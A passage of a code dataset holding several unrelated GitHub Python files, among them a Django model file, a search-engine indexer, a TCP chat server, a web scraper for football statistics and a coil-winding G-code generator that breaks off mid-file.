on_delete=models.CASCADE)\n question = models.CharField(max_length=4096)\n type = models.CharField(max_length=100) # MCQ (multiple choice) or OEQ (open-ended)\n possible_answers = models.CharField(max_length=4096, null=True, blank=True, help_text = \"Please leave blank if OEQ\")\n\n def __str__(self):\n return \"{}: {}\".format(self.video, self.question)\n\nclass Module(models.Model):\n video = models.ForeignKey(Video, on_delete=models.CASCADE)\n questions = models.ManyToManyField(VideoQuestion)\n title = models.CharField(max_length=4096, null=True, blank=True)\n\n def __str__(self):\n module_name = self.title if self.title else str(self.id)\n return \"{}. {}\".format(str(self.id), module_name)\n\nclass ModuleCompletion(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n module = models.ForeignKey(Module, on_delete=models.CASCADE)\n time_spent = models.FloatField(null=True, blank=True, default=0.0)\n complete = models.BooleanField(default=False)\n feedback_rating = models.FloatField(default=0.0, null=True, blank=True)\n feedback = models.CharField(max_length=4096, null=True, blank=True)\n\n def __str__(self):\n return \"{} finished {}\".format(self.user, self.module.video)\n \nclass AnswerToVideoQuestion(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n video = models.ForeignKey(Video, on_delete=models.CASCADE)\n question = models.ForeignKey(VideoQuestion, on_delete=models.CASCADE)\n answer = models.CharField(max_length=4096)\n\n def __str__(self):\n return \"{} - {}\".format(self.question, self.user)\n\nclass RecommendationQueue(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n list_of_ids = models.CharField(max_length=1024, null=True, blank=True) # Series IDs for right now\n\n def __str__(self):\n return \"{}: {} \".format(self.user, self.list_of_ids)\n","repo_name":"chriskok/cikguhub","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33718374501","text":"# 1\r\nhasil_akhir = [\r\n{'nama':'Reza', 'nilai':70},\r\n{'nama':'Ciut', 'nilai':63},\r\n{'nama':'Dian', 'nilai':80},\r\n{'nama':'Badu', 'nilai':40}\r\n]\r\n\r\ndef predikatlulus(data):\r\n lulus = [mahasiswa['nama']\r\n for mahasiswa in data\r\n if mahasiswa ['nilai'] > 65]\r\n return lulus\r\n\r\nhasil = predikatlulus(hasil_akhir)\r\nprint('siswa yang lulus :',hasil)\r\n\r\n#2\r\nbuah = ['pepaya', 'mangga', 'pisang', 'durian', 'jambu']\r\n\r\ndef list_buah(buah):\r\n list_terbalik = []\r\n for i in range(len(buah)-1, -1, -1):\r\n list_terbalik.append(buah[i])\r\n return list_terbalik\r\n\r\nhasil = list_buah(buah)\r\nprint('urutan setelah dibalik :', hasil)\r\n\r\n#3\r\nbuah = ['pepaya', 'mangga', 'pisang', 'durian', 'jambu']\r\n\r\ndef duplikasi(list_buah):\r\n list_duplikasi = []\r\n for buah in list_buah:\r\n list_duplikasi.append(buah)\r\n list_duplikasi.append(buah)\r\n return list_duplikasi\r\n\r\nhasil = duplikasi(buah)\r\nprint (hasil)\r\n\r\n#4\r\nkalimat = \"Nurul Fikri\"\r\n\r\ndef konsonan(kalimat):\r\n huruf = \"\"\r\n\r\n for i in kalimat:\r\n if i not in \"aiueo\":\r\n huruf += i\r\n return huruf\r\n\r\nhasil = konsonan('Nurul Fikri')\r\nprint('huruf konsonan dari kata nurul fikri adalah', hasil)","repo_name":"flymetudemoon/DDP","sub_path":"Quiz9.py","file_name":"Quiz9.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16209726612","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\nimport io\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\n\n\ndef projectHeader(can, name, team):\n can.drawString(125, 650, name)\n can.drawString(400, 650, team)\n\n\ndef vendor(can, name, contact, address, city, number, fax, email):\n can.drawString(217, 605, name)\n can.drawString(217, 592, contact)\n can.drawString(217, 575, address)\n can.drawString(217, 550, city)\n can.drawString(217, 535, number)\n can.drawString(217, 520, fax)\n can.drawString(217, 505, email)\n\n\ndef add_Item(can, amount, partNum, partName, unitPrice, lineNum):\n lineNum %= 5\n #42\n can.drawString(65, 460 - (lineNum * 29), str(int(amount)))\n can.drawString(92, 460 - (lineNum * 29), partNum)\n can.drawString(450, 460 - (lineNum * 29), \"$\" + str(unitPrice))\n can.drawString(500, 460 - (lineNum * 29), \"$\" + str(amount * unitPrice))\n\n if len(partName)>42:\n wordIndex = 0\n letterIndex = 0\n words = partName.split(\" \")\n for word in words:\n letterIndex += len(word)\n if letterIndex >42:\n letterIndex-=len(word)\n break\n letterIndex+=1\n can.setFontSize(10)\n can.drawString(175, 460 - (lineNum * 28)+5, partName[0:letterIndex-1])\n can.drawString(175, 460 - (lineNum * 28)-10, partName[letterIndex:len(partName)])\n else:\n can.drawString(175, 460 - (lineNum * 28), partName)\n return amount * unitPrice\n\n\ndef createPdf(parts, team, company,count):\n # Create Page\n packet = io.BytesIO()\n can = canvas.Canvas(packet, pagesize=letter)\n\n projectHeader(can, \"Alex\", \"BrainBot\")\n\n # Vendor Input\n vendor(can, \"amazon\", \"\", \"380 john st\", \"Rochester\", \"696-969-6969\", \"Fax Who?\", \"corgie@rit.edu\")\n\n # Part Purchase\n subTotal = 0.0\n for i in range(len(parts)):\n subTotal += add_Item(can,parts[i].quantity, \"\", parts[i].part, parts[i].price, i)\n\n\n can.drawString(500, 323, \"$\" + str(subTotal))\n # Name Line\n can.drawString(300, 243, \"Alex Burbano arb8590@rit.edu\")\n can.drawString(530, 243, \"9/20/21\")\n can.save()\n # move to the beginning of the StringIO buffer\n packet.seek(0)\n\n # create a new PDF with Reportlab\n new_pdf = PdfFileReader(packet)\n # read your existing PDF\n existing_pdf = PdfFileReader(open(\"Form.pdf\", \"rb\"))\n output = PdfFileWriter()\n # add the \"watermark\" (which is the new pdf) on the existing page\n page = existing_pdf.getPage(0)\n page.mergePage(new_pdf.getPage(0))\n output.addPage(page)\n # finally, write \"output\" to a real file\n outputStream = open(\"./finished/\" + team +\"-\"+ company+\"-\"+str(count) + \".pdf\", \"wb\")\n output.write(outputStream)\n outputStream.close()\n\n\ndef createPdfs(partDictionary):\n for team in partDictionary:\n for company in partDictionary[team]:\n for i in range(len(partDictionary[team][company])):\n createPdf(partDictionary[team][company][i], team, company,i)\n","repo_name":"Alexandr5656/MDRC-Form","sub_path":"PDF.py","file_name":"PDF.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73879155112","text":"# Team Members:\n# Joanna Chen, 66238804\n# Yui Guo, 75458764\n# Weiyu Hao, 59955246\n# Ruiyang Wang, 52294785\n\nfrom bs4 import BeautifulSoup, SoupStrainer\nimport nltk\nfrom nltk.tokenize import word_tokenize\nimport os, json, pickle\nfrom collections import defaultdict\nfrom invert_index import InvertedIndex\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import words\nfrom lxml import etree\n\n# import requests\nimport time\n\n#nltk.download('words')\nenglish_words = words.words()\nperform_index = {}\n\n#word_freq = defaultdict(int)\nID_dict = defaultdict(str) # {doc_id: url}\nID_count = 1\nTEST_SIZE = 999999\n\nbatch_size = 20000 # 20000\nfile_index = 1\n\nfile_list = []\n\nindex_dict = InvertedIndex()\n\nps = PorterStemmer()\n\ndef createID(url):\n global ID_count\n if url not in ID_dict.values():\n ID_dict[ID_count] = url\n ID_count += 1\n return ID_count - 1\n else:\n return list(ID_dict.keys())[list(ID_dict.values()).index(url)]\n\n\ndef read_files():\n # path_to_json = 'DEV/www_ics_uci_edu/'\n path_to_json = 'DEV/'\n # Get all the directories within the path\n dirs = [path for path in os.listdir(path_to_json)]\n json_files = []\n for d in dirs:\n if d.startswith('.'):\n continue\n path = path_to_json + d + '/'\n print(path)\n\n # testing only\n #if path == 'DEV/cbcl_ics_uci_edu/':\n\n # Process files from each directory\n dir_files = [pos_json for pos_json in os.listdir(path) if pos_json.endswith('.json')]\n \n process_files(path, dir_files)\n # for last time append\n global file_index\n print(f'####################\\n{ID_count}\\n######################')\n memory_file = \"memory_file_\" + str(file_index) + \".txt\"\n file_list.append(memory_file)\n f = open(memory_file, \"w\")\n small_sorted_dict = sorted(index_dict.index.items())\n for i in small_sorted_dict:\n f.write(f'{i[0]}---{i[1]}\\n')\n file_index += 1\n print(file_index)\n index_dict.index = defaultdict(dict)\n f.close()\n\n\ndef process_files(json_path, files):\n counter = 1\n\n print(f\"STARTING: {json_path}, TEST SIZE: {str(TEST_SIZE)}\")\n counter = 1\n for file_name in files:\n # # politeness 0.3s:\n # time.sleep(0.3)\n if counter > TEST_SIZE:\n break\n\n # Keep track of progress\n if counter % 50 == 0:\n print(\"INDEXING...: \" + str(counter))\n counter += 1\n\n global file_index\n if ID_count % batch_size == 0:\n print(f'####################\\n{ID_count}\\n######################')\n memory_file = \"memory_file_\" + str(file_index) + \".txt\"\n file_list.append(memory_file)\n f = open(memory_file, \"w\")\n small_sorted_dict = sorted(index_dict.index.items())\n for i in small_sorted_dict:\n f.write(f'{i[0]}---{i[1]}\\n')\n file_index += 1\n print(file_index)\n index_dict.index = defaultdict(dict)\n f.close()\n\n with open(os.path.join(json_path, file_name), 'r') as f:\n # loads the dictionary inside each json file\n data = json.load(f)\n # Get three elements\n url = data['url']\n content = data['content']\n encode = data['encoding']\n\n # no need to check validility of url\n # check if url is duplicated\n doc_ID = createID(url)\n # print(f'doc_ID: {doc_ID}')\n\n soup = BeautifulSoup(content, \"html.parser\")\n h1 = soup.find('h1')\n h2 = soup.find('h2')\n h3 = soup.find('h3')\n b = soup.find('b')\n text = soup.get_text()\n\n tokens = tokenize(text, doc_ID, h1,h2,h3,b)\n\n #print(word_freq)\n\n \ndef score_token(text, token,h1,h2,h3,b):\n # Define a dictionary to hold the scores\n tag_scores = {'h1': 20, 'h2': 19, 'h3': 18, 'b': 10}\n\n # # Define a CSS selector to find multiple tags\n # selector = 'h1, h2'\n\n # # Find all occurrences of the specified tags using the CSS selector\n # tags = soup.select(selector)\n\n #soup = BeautifulSoup(text, 'html.parser')\n\n if h1:\n if token in h1.get_text():\n #print('h1')\n return [token, 20]\n if h2:\n if token in h2.get_text():\n #print('h2')\n return [token, 19]\n if h3:\n if token in h3.get_text():\n #print('h3')\n return [token, 18]\n if b:\n if token in b.get_text():\n #print('b')\n return [token, 10]\n\n # # Find the first tag of this type\n # for tag in tags:\n # #print(tag)\n # if token in tag.get_text():\n # #return [token, 0]\n # return [token, tag_scores.get(tag.name, 0)]\n \n # If the token was not found in any of the tags, return a score of 0\n return [token, 0]\n\ndef tokenize(text, doc_ID, h1,h2,h3,b):\n # nltk to tokenize the text provided\n tokens = word_tokenize(text)\n\n # update the word_frequency dictionary and give the word count of this page\n token_count = 0\n for token in tokens:\n word = token.lower()\n if word.isalnum():\n #find the score of this token for the first time it appears in the context['This', 19]\n word2 = ps.stem(word)\n \n #word_freq[word2] += 1\n if doc_ID in index_dict.index[word2]:\n #just increment the frequency within a doc\n index_dict.index[word2][doc_ID][0] += 1\n else:\n #update the token_value according to the first appearance\n token_value = score_token(text, word,h1,h2,h3,b)[1]\n token_count += 1\n index_dict.index[word2][doc_ID] = [1, token_value] # [1, token_value]\n #print(index_dict.index)\n return list(set(tokens))\n\n\ndef merge_file():\n \n # file1 = open(file_list[0], \"r+\")\n # file2 = open(file_list[1], \"r+\")\n # file3 = open(file_list[2], \"r+\")\n\n file1 = open('memory_file_1.txt', \"r+\")\n file2 = open('memory_file_2.txt', \"r+\")\n file3 = open('memory_file_3.txt', \"r+\")\n\n t1 = file1.readline()\n t2 = file2.readline()\n t3 = file3.readline()\n\n counter = 0\n while t1 != '' or t2 != '' or t3 != '':\n if counter % 100 == 0:\n #print(t1,t2,t3)\n pass\n counter += 1\n token_list = [None, None, None] #['token', {}]\n if t1 != '':\n token1 = t1.split(\"---\")\n token_list[0] = token1\n if t2 != '':\n #print(\"2: \",t2)\n token2 = t2.split(\"---\")\n token_list[1] = token2\n if t3 != '':\n token3 = t3.split(\"---\")\n token_list[2] = token3\n\n # Find the smallest token from lists and the index\n filtered_list = [word for word in token_list if word is not None]\n min_list = min(filtered_list,key=lambda x:x[0]) #['token', {}]\n min_token = min_list[0] #return token\n min_file = token_list.index(min_list) #return file number\n\n next_list = [min_file] #files that need to move to next line\n merge_list = []\n min_dict = eval(token_list[min_file][1])\n merge_list.append(min_dict)\n\n #merged_file = open('index.txt', 'a')\n with open('index.txt', 'a') as merged_file:\n\n for i in range(len(token_list)):\n if i != min_file:\n if token_list[i] != None and min_token == token_list[i][0]:\n merge_list.append(eval(token_list[i][1]))\n next_list.append(i)\n\n if len(merge_list) > 1:\n merge_dict = merge_list[0]\n for i in merge_list[1:]:\n for k, v in i.items():\n merge_dict[k] = v\n #print(merge_dict)\n #print(min_token + '---' + str(merge_dict))\n merged_file.write(min_token + '---' + str(merge_dict) + '\\n')\n merged_file.flush()\n else:\n #print(min_token + '---' + str(merge_dict))\n merged_file.write(min_token + '---' + str(min_dict) + '\\n')\n merged_file.flush()\n\n if len(next_list) == 0:\n return\n\n for i in next_list: # [0,1]\n #print(f\"printing next list: {i}\")\n if i == 0 and t1 != '':\n t1 = file1.readline()\n #print(f\"1!!!{t1}\")\n elif i == 1 and t2 != '':\n t2 = file2.readline()\n #print(f\"2!!!{t2}\")\n elif i == 2 and t3 != '':\n t3 = file3.readline()\n #print(f\"3!!!{t3}\")\n #merged_file.close()\n\n\n\n\n# start the program\nif __name__ == '__main__':\n read_files()\n\n # sorted_index = sorted(index_dict.index.items())\n\n count = 0\n\n merge_file()\n\n perform_index = {}\n\n f2 = open('main_index.txt', \"w+\")\n\n # with open('ori_index.txt', 'w') as f:\n # # f2.write(str(len(sorted_index)//100) + '\\n')\n # for i in sorted_index:\n # if count % 1000 == 0:\n f = open('index.txt', \"r\")\n byte = 0\n text = f.readlines()\n\n common_words = ('computer','science','machine','learning','engineering',\"algorithm\",\\\n \"data\", \"program\", \"code\", \"variable\", \"function\", \"class\", \"object\", \"interface\", \\\n \"method\", \"loop\", \"conditional\", \"what\", \"array\", \"list\", \"string\", \"integer\", \"boolean\",\\\n \"file\", \"database\", \"network\", \"server\", \"client\", \"protocol\", \"encryption\",\\\n \"decryption\", \"memory\", \"cpu\", \\\n \"gpu\", \"cache\", \"thread\", \"process\", \"concurrency\", \"parallelism\", \"big data\", \\\n \"artificial intelligence\", \"machine learning\", \"deep learning\", \"neural network\",\\\n \"cloud computing\", \"virtualization\", \"or\", \"web development\", \"api\", \"framework\", \"security\", \"vulnerability\", \"debugging\", \"testing\", \"software\", \"hardware\", \"database\", \"management\", \"data\", \"structure\", \"algorithmic\", \"to\", \"complexity\", \"be\", \"recursion\", \"sorting\", \"searching\", \"graph\", \"tree\", \"linked\", \"list\", \"queue\", \"stack\", \"hashing\", \"operating\", \"system\", \"file\", \"networking\", \"client\", \"server\", \"internet\", \"cybersecurity\", \"cryptography\", \"authentication\", \"authorization\", \"privacy\", \"integrity\", \"cloud\", \"storage\", \"distributed\", \"computing\", \"virtual\", \"machine\", \"web\", \"not\", \"application\", \"mobile\", \"app\", \"responsive\", \"design\", \"user\", \"interface\", \"experience\", \"agile\", \"development\", \"version\")\n\n for i in text:\n #f2.write(f\"{i[0]} {os.stat('ori_index.txt').st_size}\\n\")\n # save the most common token in cache\n if i.split('---')[0] in common_words:\n perform_index[i.split('---')[0]] = eval(i.split('---')[1])\n\n if count % 800 == 0: # this creates 800 main index, and each with 800 interval\n f2.write(f\"{i.split('---')[0]} {byte}\\n\")\n \n byte += len(i.encode())\n #f.write(f'{i[0]}---{i[1]}\\n')\n #f.flush()\n count += 1\n f2.close()\n f.seek(7801)\n #print(f.readline())\n f.close()\n with open(\"perform_index.json\",'w') as file:\n json.dump(perform_index,file)\n with open('urls.json', 'w') as f3:\n json.dump(ID_dict, f3)\n\n # # get size of the file in KB\n # file_size = os.path.getsize('index.txt') / 1024\n\n # # generate report\n # with open('report.txt', 'w+') as file:\n # file.write(\"Team Members:\\n\")\n # file.write(\"Joanna Chen, 66238804\\n\")\n # file.write(\"Yui Guo, 75458764\\n\")\n # file.write(\"Weiyu Hao, 59955246\\n\")\n # file.write(\"Ruiyang Wang, 52294785\\n\")\n # file.write(\"\\n\\n\\n\\n\")\n # file.write(\"Number of Documents: \" + str(ID_count))\n # file.write(\"\\n\\n\")\n # file.write(\"Number of Unique Tokens: \" + str(len(index_dict.index)))\n # file.write(\"\\n\\n\")\n # file.write(\"File size of index in disk is \" + str(round(file_size, 2)) + \"KB\")\n # file.write(\"\\n\\n\")\n # file.write(\"DocID with URLs:\\n\")\n # for k, v in ID_dict.items():\n # file.write(f'DocID {k} ----- {v}\\n')\n\n # for k,v in index_dict.index.items():\n # print(f\"###########{k}: -------------{v}\")\n # print(f'url {ID_dict[list(v.keys())[0]]} for key {v}')\n","repo_name":"WHao-0923/Engine","sub_path":"generate_index.py","file_name":"generate_index.py","file_ext":"py","file_size_in_byte":12352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7322165773","text":"from queue import *\n# Using built-in queue function\n\n# time complexity: O(n)\n# sapce complexity: O(1) -- best; O(n) -- worst, average \n\n# Get inspiration from here: https://blog.csdn.net/coder_orz/article/details/51363095\n# from queue import *\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.left_child = None\n self.right_child = None\n\ndef level_order(node):\n q = Queue() # Using put(), get() for enque and deque\n \n # node is not None\n if node:\n q.put(node)\n while not q.empty():\n current = q.get()\n print(current.value)\n if current.left_child != None: q.put(current.left_child)\n if current.right_child != None: q.put(current.right_child)\n\n# Construct a binary tree\nroot = Node(5)\nroot.left_child = Node(3)\nroot.left_child.left_child = Node(2)\nroot.left_child.right_child = Node(4)\nroot.right_child = Node(10)\nroot.right_child.left_child = Node(6)\nroot.right_child.right_child = Node(11)\n\nlevel_order(root)\n","repo_name":"ImAtestForMeng/algorithms","sub_path":"tree/bst_level_order.py","file_name":"bst_level_order.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44612624325","text":"n = int(input('Введите количество минут\\n'))\ndef time(n):\n hours = n // 60\n while hours > 24:\n hours = hours % 24\n minutes = n % 60\n time = hours, minutes\n return time\n\nprint(time(n))","repo_name":"Rauntfett/Chekanov-AM","sub_path":"задание 3/3.3/3.3.py","file_name":"3.3.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17614296844","text":"from util import get_client, INDEX_NAME\n\nclient = get_client()\n\nresp = client.search(index=INDEX_NAME, query={'match_all': {}})\n\nprint(f'Got {resp[\"hits\"][\"total\"][\"value\"]} Hits:')\nfor hit in resp['hits']['hits']:\n doc = hit['_source']\n score = hit['_score']\n # print('Headline:', doc['headline'], 'Description\\n\\t', doc['short_description'])\n print(hit)\n","repo_name":"tomas-koristka/elastic-search-playground","sub_path":"query/query_all.py","file_name":"query_all.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33445323269","text":"#Author -- Stephen Rosen\n\nfrom __future__ import print_function\nimport lxml.etree as etree\nimport string, re\n\n#cleans up the xpath expression for use in our xml, respecting xpath syntax\ndef clean_xpath(exp):\n def clean_single_exp(exp):\n #prepend a '_' to each section, and clean it up for our xml\n parts = re.split('(?= 6 and part[0:6] == 'node()'):\n continue\n else:\n parts[i] = make_name_conform(part.strip())\n return \"/\".join(parts)\n #split into multiple xpath expressions on OR, conform, then merge\n expressions = exp.split('|')\n return ' | '.join([clean_single_exp(x.strip()) for x in expressions])\n\n\ndef make_name_conform(exp):\n #can't use a regex for this because bracket nesting is recursive\n exp=list(exp) #convert to list of chars\n #We used to think we could just explicitly check a set of bad characters, oh, how naive we were...\n goodchars=string.letters+string.digits\n brackets = 0\n #replace bad chars with underscores, unless they are in brackets\n for i in xrange(len(exp)):\n cur = exp[i]\n if cur == '[': brackets+=1\n elif cur == ']':\n brackets-=1\n if brackets < 0: brackets = 0\n elif brackets == 0:\n if cur not in goodchars:\n exp[i]='_'+str(ord(cur))+'_'\n if cur == '\\\\': exp[i] =''\n elif cur == '/':\n if (i > 0) and exp[i-1] == '\\\\':\n exp[i]='_'\n exp[i-1]=''\n exp=''.join(exp) #convert back into a string\n return '_'+exp\n\n#sadly, the attributes are not always safe in xml\ndef clean_attribute(attribute):\n attribute=list(attribute)\n for i in xrange(len(attribute)):\n if attribute[i] in '&<\"' or attribute[i] not in string.printable:\n attribute[i] = '_'+str(ord(attribute[i]))+'_'\n return ''.join(attribute)\n","repo_name":"sirosen/inv_parser","sub_path":"xml_cleanup.py","file_name":"xml_cleanup.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41227353474","text":"import threading\nimport socket\n\nhost = \"127.0.0.1\"\nport = 49999\n\n# TCP\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((host, port))\nserver.listen()\n\nclients = []\nnicknames = []\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message.encode(\"ascii\"))\n\n\n# for each client, run handle(client) function\ndef handle(client):\n while True:\n try:\n # Receive message from a client and then broadcast the message\n # to all clients\n message = client.recv(1024).decode(\"ascii\")\n broadcast(message)\n except:\n index = clients.index(client)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n broadcast(f\"{nickname} left the chat!\")\n nicknames.remove(nickname)\n break\n\n\ndef receive():\n while True:\n # Wait for an incoming connection.\n # Return a new socket representing the connection,\n # and the address of the client.\n client, address = server.accept()\n print(f\"Connected with {str(address)}\")\n\n client.send(\"NICK\".encode(\"ascii\"))\n nickname = client.recv(1024).decode(\"ascii\")\n\n nicknames.append(nickname)\n clients.append(client)\n\n print(f\"Nickname of the client is {nickname}\")\n broadcast(f\"{nickname} joined the chat\")\n print(\"Current users in the chat room: \", nicknames)\n client.send(\"Connected to the server!\".encode(\"ascii\"))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint(f\"Server is listening on port {port}\")\nreceive()\n","repo_name":"weilyuwang/python-network-programming","sub_path":"tcp_chat_room/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16950915949","text":"import pygame\r\nfrom pygame.sprite import Sprite\r\n\r\n\r\nclass StarInfo(Sprite):\r\n \"\"\"A class to represent a star.\"\"\"\r\n\r\n def __init__(self, star):\r\n \"\"\"Initialize the alien and set its starting position.\"\"\"\r\n super().__init__()\r\n self.screen = star.screen\r\n\r\n self.image = pygame.image.load('images/Capture.bmp')\r\n self.rect = self.image.get_rect()\r\n\r\n self.rect.x = self.rect.width\r\n self.rect.y = self.rect.height\r\n\r\n self.x = float(self.rect.x)\r\n\r\n\r\n\r\n","repo_name":"noshah/Python_Practice","sub_path":"chapter13_practice/star_info.py","file_name":"star_info.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33368814468","text":"import cv2\nimport numpy as np\nimport pyautogui\nimport keyboard\n\n# Get the size of the screen using pyautogui\nscreen_size = tuple(pyautogui.size())\n\n# Define the format and create video writer object\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('output.avi', fourcc, 20.0, (screen_size))\n\nwhile True:\n # Capture Screen\n img = pyautogui.screenshot()\n\n #Convert image into numpy array\n img = np.array(img)\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n out.write(img)\n\n # To Exit press q to terminate\n if(keyboard.is_pressed('q')):\n print(\"Recording Stopped\")\n break\n\nout.release()\ncv2.destroyAllWindows()\n","repo_name":"pmihsan/Python-GUI-Programs","sub_path":"Applications/ScreenRecorder/screenRecorder.py","file_name":"screenRecorder.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1229504067","text":"#coding:utf-8\nfrom urllib import request\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.okooo.com/soccer/team/6/players/'\nhds = { \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\", \n \"Accept-Language\": \"zh-CN,zh;q=0.8\", \n \"Cache-Control\": \"no-cache\", \n \"Connection\": \"keep-alive\", \n \"Host\": \"www.okooo.com\", \n \"Upgrade-Insecure-Requests\": \"1\", \n \"Pragma\": \"no-cache\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36\"}\n\nreqhd = request.Request(url, headers = hds)\nreq = request.urlopen(reqhd)\ncon = req.read().decode('gbk')\nrs = re.findall(r'', con, re.S)\nsoup = BeautifulSoup(rs[0], 'html5lib')\ndata_list = [] # 结构: [dict1, dict2, ...], dict结构{'船名': ship_name, '航次': voyage, '提单号': bill_num, '作业码头': wharf}\nfor idx, tr in enumerate(soup.find_all('tr')):\n if idx != 0:\n tds = tr.find_all('td')\n data_list.append({\n '号码': tds[0].contents[0],\n '球员': tds[1].a.contents[0],\n '位置': tds[2].contents[0],\n '出场': tds[3].contents[0],\n '首发': tds[4].contents[0],\n '替补': tds[5].contents[0],\n '出场时间': tds[6].contents[0],\n '进球': tds[7].contents[0],\n '助攻': tds[8].contents[0],\n '黄牌': tds[9].contents[0],\n '红牌': tds[10].contents[0],\n })\nprint(data_list)","repo_name":"lidongheng/FootballmatchAnalysing","sub_path":"before/okooo.py","file_name":"okooo.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44049236015","text":"import math \n\nfile = open(\"test.gcode\",\"w\") \n \nfile.write(\"G92 X0 Y0 Z0 E0\\n\")\nfile.write(\"G90\\n\") \nfile.write(\"M85 600\\n\") \n\n\n\ncartesianCode = 0\nnumStatorPoles = 12\nRotFeed = 1\n\nextrudeFake = 0\n\ndef toXYZ(x,z,angle):\n if cartesianCode:\n global extrudeFake\n extrudeFake=extrudeFake+1\n file.write(\"G1 \") \n if x!=None and angle!=None:\n file.write(\" X{}\".format(x*math.cos(math.radians(angle))))\n if angle!=None:\n yy = x*math.sin(math.radians(angle))\n file.write(\" Y{}\".format(yy))\n if z!=None:\n file.write(\" Z{}\".format(z))\n if angle!=None:\n file.write(\" E{}.{}\".format(extrudeFake,int(angle*100)))\n file.write(\"\\n\")\n else:\n file.write(\"G1 \") \n if x!=None:\n file.write(\" X{}\".format(x))\n file.write(\" Y{}\".format(0))\n if z!=None:\n file.write(\" Z{}\".format(z))\n if angle!=None:\n file.write(\" E{}\".format(angle/360.0))\n file.write(\"\\n\")\n\n\n#toXYZ(0,0,0);\n\n\nz = 0\nzUpDelta = 16\nxLen = 9\nxStart = 0 if cartesianCode==0 else 10\nxIncr = 0.35\nxRotCompensation = 0.2\n\nfile.write(\"G1 F500\\n\") \n\nwiringType = 0\n\nif wiringType==0:\n # total \n numTurnsValue = 23\n numTurnsPerLayer = [ \n {\"numTurns\":numTurnsValue, \"xStart\":xStart, \"xIncr\":xIncr, \"xRotCompensation\":xRotCompensation },\n {\"numTurns\":numTurnsValue, \"xStart\":xStart+numTurnsValue*xIncr, \"xIncr\":-xIncr,\"xRotCompensation\":-xRotCompensation },\n {\"numTurns\":numTurnsValue, \"xStart\":xStart, \"xIncr\":xIncr,\"xRotCompensation\":xRotCompensation },\n {\"numTurns\":4, \"xStart\":xStart+numTurnsValue*xIncr-2*xIncr, \"xIncr\":-xIncr*2,\"xRotCompensation\":-xRotCompensation },\n {\"numTurns\":4, \"xStart\":xStart+numTurnsValue*xIncr-4*2*xIncr, \"xIncr\":xIncr*2,\"xRotCompensation\":xRotCompensation },\n {\"numTurns\":numTurnsValue-10, \"xStart\":xStart+numTurnsValue*xIncr, \"xIncr\":-xIncr,\"xRotCompensation\":-xRotCompensation },\n #{\"numTurns\":numTurnsValue, \"xStart\":xStartr, \"xIncr\":xIncr },\n #{\"numTurns\":numTurnsValue/2, \"xStart\":xStart+numTurnsValue*xIncr, \"xIncr\":-xIncr },\n ]\nelse:\n # test\n numTurnsPerLayer = [ \n {\"numTurns\":2, \"xStart\":xStart, \"xIncr\":3,\"xRotCompensation\":xRotCompensation },\n {\"numTurns\":2, \"xStart\":xStart+5, \"xIncr\":-3,\"xRotCompensation\":xRotCompensation },\n ]\n\ncount = 0\nfor turns in numTurnsPerLayer:\n numTurns = turns[\"numTurns\"]\n count+=numTurns\n\nprint(\"NumTurns: \",count)\n\n\ndef CW(pole):\n file.write(\";CW\\n\") \n curAngle = 360/numStatorPoles*pole\n nextAngle = 360/numStatorPoles*(pole+1)\n for turns in numTurnsPerLayer:\n numTurns = turns[\"numTurns\"]\n xCurStart = turns[\"xStart\"]\n xCurIncr = turns[\"xIncr\"]\n xCurRotComp = turns[\"xRotCompensation\"]\n for turn in range(numTurns):\n toXYZ(xCurStart+xCurIncr*turn,z,curAngle)\n toXYZ(xCurStart+xCurIncr*turn,z+zUpDelta,curAngle)\n toXYZ(xCurStart+xCurIncr*turn+xCurRotComp,z+zUpDelta,nextAngle)\n if 